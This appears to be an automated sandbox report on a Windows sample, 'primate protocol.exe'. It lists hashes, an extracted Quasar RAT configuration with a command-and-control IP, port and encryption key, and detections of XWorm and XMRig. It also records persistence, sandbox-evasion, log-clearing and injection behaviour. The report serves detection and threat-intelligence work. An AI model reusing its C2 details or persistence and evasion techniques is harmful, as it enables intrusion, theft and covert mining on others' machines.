Analysis
max time kernel: 133s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/05/2025, 16:15
Static task: static1
Behavioral task: behavioral1
  Sample: primate protocol.exe
  Resource: win10v2004-20250502-en
Behavioral task: behavioral2
  Sample: primate protocol.exe
  Resource: win11-20250502-en
General
Target: primate protocol.exe
Size: 4.7MB
MD5: 28fccc4c460bbe5df088d182c156531c
SHA1: 0e4ff4e76b430ae326ff14d4e0e304b38497a9ab
SHA256: fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
SHA512: 49f8d5feb07aff5efc0d592cd7886e7da3a7a6069f64b8332d0696c2860b5376c34d8825fa6f3c8a6f5590de803b1e840cc41605d24199c9890e0d23d2f4fca8
SSDEEP: 49152:SmQvdtV2bnS7TKxxXf4cFefFbAbsW4H94VPxfAcGDtpZ4Bl6nQWPvkO8oiTa8qd+:SZtV2SsfHeW4HmVPG7RYBlUPvbAEba
Malware Config
Extracted
quasar
1.6.0
client
174.61.118.194:4872
eab25b68-ae09-4c5c-b42f-516771913f6f
encryption_key: 4ECD6F0D7A0CD0888AC4DF40F22ECF5C3E76855B
install_name: sysprochost.exe
key_salt: 5a23f8394640cb9e40658446a04c0bbae82dc93d0470e1b2a406a90fd2520382
log_directory: ok
reconnect_delay: 3000
startup_key: HOST
Signatures
Detect Xworm Payload 4 IoCs
resource yara_rule
behavioral1/files/0x00070000000241e0-25.dat family_xworm
behavioral1/memory/1060-33-0x00000000006C0000-0x000000000072A000-memory.dmp family_xworm
behavioral1/memory/3096-1470-0x0000000000F40000-0x0000000000FAA000-memory.dmp family_xworm
behavioral1/memory/5876-2431-0x0000000000220000-0x000000000028A000-memory.dmp family_xworm
Quasar family
Quasar payload 2 IoCs
resource yara_rule
behavioral1/files/0x00080000000241dc-4.dat family_quasar
behavioral1/memory/3880-21-0x000001A4E37B0000-0x000001A4E3942000-memory.dmp family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target
PID 4480 created 616 4480 powershell.EXE 5
PID 5052 created 616 5052 powershell.EXE 5
Xmrig family
Xworm family
XMRig Miner payload 5 IoCs
resource yara_rule
behavioral1/memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral1/memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral1/memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral1/memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral1/memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
pid Process
4480 powershell.EXE
5052 powershell.EXE
2592 powershell.exe
Creates new service(s) 2 TTPs
Stops running service(s) 4 TTPs
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up the country code configured in the registry, likely as a geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation primate protocol.exe
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation CompPkg.exe
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation systemprocess.exe
Drops startup file 2 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe CompPkg.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe CompPkg.exe
Executes dropped EXE 7 IoCs
pid Process
3880 systemprocess.exe
5948 host.exe
1060 CompPkg.exe
4904 CompPkg.exe
1632 ijujdfuujtjk.exe
3096 CompPkg.exe
5876 CompPkg.exe
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" CompPkg.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
Drops file in System32 directory 6 IoCs
description ioc Process
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img" CompPkg.exe
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target
PID 5948 set thread context of 704 5948 host.exe 118
PID 1632 set thread context of 4492 1632 ijujdfuujtjk.exe 140
PID 1632 set thread context of 6036 1632 ijujdfuujtjk.exe 141
PID 1632 set thread context of 4832 1632 ijujdfuujtjk.exe 142
PID 4480 set thread context of 3148 4480 powershell.EXE 145
PID 5052 set thread context of 4500 5052 powershell.EXE 146
resource yara_rule
behavioral1/memory/4832-152-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-154-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-153-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral1/memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp upx
Drops file in Windows directory 3 IoCs
description ioc Process
File created C:\Windows\systemprocess.exe primate protocol.exe
File created C:\Windows\host.exe primate protocol.exe
File created C:\Windows\CompPkg.exe primate protocol.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
1100 sc.exe
1292 sc.exe
1800 sc.exe
3532 sc.exe
1920 sc.exe
2760 sc.exe
1760 sc.exe
4340 sc.exe
2008 sc.exe
4092 sc.exe
1240 sc.exe
1524 sc.exe
4056 sc.exe
2580 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language primate protocol.exe
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process
4036 netsh.exe
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe
Delays execution with timeout.exe 2 IoCs
pid Process
832 timeout.exe
3552 timeout.exe
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
description ioc Process
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE
Modifies data under HKEY_USERS 64 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133907626609832177" chrome.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE
Modifies registry class 10 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{C39E5D0C-9F5A-4087-ACFB-9AFB8511C36F} msedge.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{1B8FE61C-B4DB-4F04-8069-E6E2E8EE2AD7} msedge.exe
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings OpenWith.exe
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
4756 schtasks.exe
4760 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process
3880 systemprocess.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
4440 powershell.exe
2336 powershell.exe
2336 powershell.exe
4440 powershell.exe
3880 systemprocess.exe
2592 powershell.exe
2592 powershell.exe
5948 host.exe (×10)
1632 ijujdfuujtjk.exe (×2)
4480 powershell.EXE (×2)
1632 ijujdfuujtjk.exe (×6)
4480 powershell.EXE
5052 powershell.EXE (×3)
4480 powershell.EXE
3148 dllhost.exe (×4)
5052 powershell.EXE
4500 dllhost.exe (×8)
3880 systemprocess.exe
4500 dllhost.exe (×18)
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process
3556 Explorer.EXE
4064 OpenWith.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process
2016 chrome.exe (×4)
6000 msedge.exe (×2)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeDebugPrivilege 3880 systemprocess.exe
Token: SeDebugPrivilege 1060 CompPkg.exe
Token: SeDebugPrivilege 2336 powershell.exe
Token: SeDebugPrivilege 4440 powershell.exe
Token: SeDebugPrivilege 4904 CompPkg.exe
Token: SeDebugPrivilege 2592 powershell.exe
Token: SeDebugPrivilege 5948 host.exe
Token: SeDebugPrivilege 4480 powershell.EXE
Token: SeDebugPrivilege 1632 ijujdfuujtjk.exe
Token: SeDebugPrivilege 5052 powershell.EXE
Token: SeDebugPrivilege 4480 powershell.EXE
Token: SeDebugPrivilege 3148 dllhost.exe
Token: SeDebugPrivilege 5052 powershell.EXE
Token: SeDebugPrivilege 4500 dllhost.exe
Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe
Token: SeIncreaseQuotaPrivilege 2256 svchost.exe
Token: SeSecurityPrivilege 2256 svchost.exe
Token: SeTakeOwnershipPrivilege 2256 svchost.exe
Token: SeLoadDriverPrivilege 2256 svchost.exe
Token: SeSystemtimePrivilege 2256 svchost.exe
Token: SeBackupPrivilege 2256 svchost.exe
Token: SeRestorePrivilege 2256 svchost.exe
Token: SeShutdownPrivilege 2256 svchost.exe
Token: SeSystemEnvironmentPrivilege 2256 svchost.exe
Token: SeUndockPrivilege 2256 svchost.exe
Token: SeManageVolumePrivilege 2256 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe
Token: SeIncreaseQuotaPrivilege 2256 svchost.exe
Token: SeSecurityPrivilege 2256 svchost.exe
Token: SeTakeOwnershipPrivilege 2256 svchost.exe
Token: SeLoadDriverPrivilege 2256 svchost.exe
Token: SeSystemtimePrivilege 2256 svchost.exe
Token: SeBackupPrivilege 2256 svchost.exe
Token: SeRestorePrivilege 2256 svchost.exe
Token: SeShutdownPrivilege 2256 svchost.exe
Token: SeSystemEnvironmentPrivilege 2256 svchost.exe
Token: SeUndockPrivilege 2256 svchost.exe
Token: SeManageVolumePrivilege 2256 svchost.exe
Token: SeDebugPrivilege 4600 wmiprvse.exe
Token: SeAuditPrivilege 2168 svchost.exe
Token: SeAuditPrivilege 2652 svchost.exe
Token: SeAuditPrivilege 2652 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe
Token: SeIncreaseQuotaPrivilege 2256 svchost.exe
Token: SeSecurityPrivilege 2256 svchost.exe
Token: SeTakeOwnershipPrivilege 2256 svchost.exe
Token: SeLoadDriverPrivilege 2256 svchost.exe
Token: SeSystemtimePrivilege 2256 svchost.exe
Token: SeBackupPrivilege 2256 svchost.exe
Token: SeRestorePrivilege 2256 svchost.exe
Token: SeShutdownPrivilege 2256 svchost.exe
Token: SeSystemEnvironmentPrivilege 2256 svchost.exe
Token: SeUndockPrivilege 2256 svchost.exe
Token: SeManageVolumePrivilege 2256 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe
Token: SeIncreaseQuotaPrivilege 2256 svchost.exe
Token: SeSecurityPrivilege 2256 svchost.exe
Token: SeTakeOwnershipPrivilege 2256 svchost.exe
Token: SeLoadDriverPrivilege 2256 svchost.exe
Token: SeSystemtimePrivilege 2256 svchost.exe
Token: SeBackupPrivilege 2256 svchost.exe
Token: SeRestorePrivilege 2256 svchost.exe
Token: SeShutdownPrivilege 2256 svchost.exe
Token: SeSystemEnvironmentPrivilege 2256 svchost.exe
